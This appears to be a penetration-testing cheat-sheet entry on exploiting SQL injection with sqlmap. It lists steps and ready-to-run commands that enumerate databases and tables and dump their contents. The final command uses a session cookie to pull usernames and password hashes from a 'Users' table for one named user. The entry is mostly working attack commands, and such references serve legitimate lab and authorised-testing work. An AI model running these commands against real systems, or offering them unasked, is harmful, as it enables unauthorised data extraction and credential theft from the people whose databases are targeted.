← Back to search

SQL Injection with sqlmap

exploitationtool

Summary

Automates SQL injection detection and data extraction; feed it a saved request with -r or a URL with -u, then drill from databases to tables to columns.

Walkthrough

Use sqlmap to confirm and exploit SQL injection, then progressively extract data from the backend database.

Steps

  • Run from a saved request (-r req.txt) or a URL (-u); raise --level/--risk to test more injection points.
  • List databases with --dbs, then tables in one with -D <database_name> --tables.
  • Dump an entire database with --dump, or target a single table with -T <table_name>.
  • Narrow extraction with -C for specific columns and --where to filter rows; pass --cookie for authenticated endpoints.

Commands

bash

sqlmap -r req.txt --batch --level 3 --risk 2

bash

sqlmap -u "http://<TARGET>/view?request=event&action=removetag&tid=1" --dbs

bash

sqlmap -u "http://<TARGET>/view?request=event&action=removetag&tid=1" -D <database_name> --tables

bash

sqlmap -u "http://<TARGET>/view?request=event&action=removetag&tid=1" -D <database_name> --dump

bash

sqlmap -u "http://<TARGET>/view?request=event&action=removetag&tid=1" -D <database_name> -T <table_name> --dump

bash

sqlmap -u "http://<TARGET>/zm/index.php?view=request&request=event&action=removetag&tid=1" \
  --cookie="ZMSESSID=6lkqf49jhdfdo1l4nplp9m9o5" \
  -D zm -T Users -C Username,Password \
  --where="Username='mark'" \
  --dump --threads 10 --batch